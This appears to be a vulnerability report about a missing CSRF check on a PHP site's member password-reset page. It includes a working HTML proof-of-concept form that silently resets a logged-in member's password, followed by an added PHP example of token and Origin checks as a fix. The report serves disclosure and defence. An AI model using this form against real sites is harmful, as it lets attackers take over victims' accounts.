Closed
Description
The vulnerability occurs in
http://localhost/www/index.php?m=member&v=pw_reset
This is the interface an ordinary member uses to reset their password.

The interface does not have CSRF protection, so an ordinary member's login password is changed without their knowledge when they open the PoC page.
PoC:
```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
<input type="hidden" name="password" value="yuduo" />
<input type="hidden" name="password2" value="yuduo" />
<input type="hidden" name="submit" value="确 定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
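One way to close the gap described in the report, shown as an added example that is not part of the original issue or the project's code: a per-session token check plus an Origin check in front of the password-reset handler. The function names `csrf_issue` and `csrf_check`, the `csrf_token` field name, and the attacker origin are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not the project's own code.

// Issue one random token per session; the reset form must embed it
// as a hidden field named csrf_token (assumed field name).
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing POST only if it carries the session's token
// and, when the browser sent an Origin header, that Origin is our own.
function csrf_check(array $session, array $post, array $server, string $ownOrigin): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return false; // token missing or wrong: treat as forged
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $ownOrigin;
}

// --- Constructed sample requests (not captured traffic) ---
$ownOrigin = 'http://localhost';
$session = [];
$token = csrf_issue($session);

// Cross-site form as in the report: only password, password2 and submit,
// so it cannot contain the victim's session token.
$forged = ['password' => 'yuduo', 'password2' => 'yuduo', 'submit' => '确 定'];
$forgedServer = ['HTTP_ORIGIN' => 'http://attacker.example']; // assumed origin

// Same fields submitted from the site's own form, which embeds the token.
$legit = $forged + ['csrf_token' => $token];
$legitServer = ['HTTP_ORIGIN' => $ownOrigin];

foreach (['forged' => [$forged, $forgedServer], 'legit' => [$legit, $legitServer]] as $name => [$post, $server]) {
    $ok = csrf_check($session, $post, $server, $ownOrigin);
    echo $name, ': ', $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

In a real handler the arguments would be `$_SESSION`, `$_POST` and `$_SERVER`, and the check would run before the new password is written. Requiring the member's current password on this form would be a second, independent barrier, since the cross-site page does not know it.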
